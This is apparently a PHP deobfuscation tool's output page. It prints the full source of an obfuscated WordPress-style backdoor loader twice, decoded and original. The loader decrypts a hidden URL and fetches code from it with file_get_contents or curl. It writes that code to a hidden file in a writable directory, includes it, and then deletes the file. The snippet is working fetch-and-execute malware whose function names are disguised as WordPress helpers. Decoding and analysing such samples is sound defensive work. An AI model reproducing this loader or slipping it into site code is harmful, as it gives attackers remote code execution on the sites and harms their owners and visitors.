Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

if (!$npDcheckClassBgp) { $ea = '_shaesx_'; $ay = 'get_data_ya'; $ae = 'decode'; $ea = st..

Decoded Output download

if (!$npDcheckClassBgp) { 
$ea = '_shaesx_'; $ay = 'get_data_ya'; $ae = 'decode'; $ea = str_replace('_sha', 'bas', $ea); $ao = 'wp_cd'; $ee = $ea.$ae; $oa = str_replace('sx', '64', $ee); $algo = 'izzabelga'; $pass = "Zgc5c4MXrLckaEMG5oxYKfGcPFHVPPhany2NXq3Tul4eZ0NfRBk4"; 
if (ini_get('allow_url_fopen')) { 
    function get_data_ya($url) { 
        $data = file_get_contents($url); 
        return $data; 
    } 
} 
else { 
    function get_data_ya($url) { 
        $ch = curl_init(); 
        curl_setopt($ch, CURLOPT_HEADER, 0); 
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
        curl_setopt($ch, CURLOPT_URL, $url); 
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8); 
        $data = curl_exec($ch); 
        curl_close($ch); 
        return $data; 
    } 
} 
function wp_cd($fd, $fa="") 
{ 
   $fe = "wp_frmfunct"; 
   $len = strlen($fd); 
   $ff = ''; 
   $n = $len>100 ? 8 : 2; 
   while( strlen($ff)<$len ) 
   { 
      $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n); 
   } 
   return $fd^$ff; 
} 
$reqw = $ay($ao($oa("$pass"), 'wp_function')); 
preg_match('#gogo(.*)enen#is', $reqw, $mtchs); 
$dirs = glob("*", GLOB_ONLYDIR); 
foreach ($dirs as $dira) { 
	if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; } 
	$subdirs = glob("$dira/*", GLOB_ONLYDIR); 
	foreach ($subdirs as $subdira) { 
		if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; } 
	} 
} 
if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); } 
fwrite($hdl, "<?php
$mtchs[1]
?>"); 
fclose($hdl); 
include("{$eb}.$algo"); 
unlink("{$eb}.$algo"); 
$npDcheckClassBgp = 'aue'; 
}

Did this file decode correctly?

Original Code

if (!$npDcheckClassBgp) {
$ea = '_shaesx_'; $ay = 'get_data_ya'; $ae = 'decode'; $ea = str_replace('_sha', 'bas', $ea); $ao = 'wp_cd'; $ee = $ea.$ae; $oa = str_replace('sx', '64', $ee); $algo = 'izzabelga'; $pass = "Zgc5c4MXrLckaEMG5oxYKfGcPFHVPPhany2NXq3Tul4eZ0NfRBk4";
if (ini_get('allow_url_fopen')) {
    function get_data_ya($url) {
        $data = file_get_contents($url);
        return $data;
    }
}
else {
    function get_data_ya($url) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8);
        $data = curl_exec($ch);
        curl_close($ch);
        return $data;
    }
}
function wp_cd($fd, $fa="")
{
   $fe = "wp_frmfunct";
   $len = strlen($fd);
   $ff = '';
   $n = $len>100 ? 8 : 2;
   while( strlen($ff)<$len )
   {
      $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n);
   }
   return $fd^$ff;
}
$reqw = $ay($ao($oa("$pass"), 'wp_function'));
preg_match('#gogo(.*)enen#is', $reqw, $mtchs);
$dirs = glob("*", GLOB_ONLYDIR);
foreach ($dirs as $dira) {
	if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; }
	$subdirs = glob("$dira/*", GLOB_ONLYDIR);
	foreach ($subdirs as $subdira) {
		if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; }
	}
}
if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); }
fwrite($hdl, "<?php\n$mtchs[1]\n?>");
fclose($hdl);
include("{$eb}.$algo");
unlink("{$eb}.$algo");
$npDcheckClassBgp = 'aue';
}

Function Calls

None

Variables

None

Stats

MD5 b2d3b2b5bc7d67a70fe19822d129e35b
Eval Count 0
Decode Time 45 ms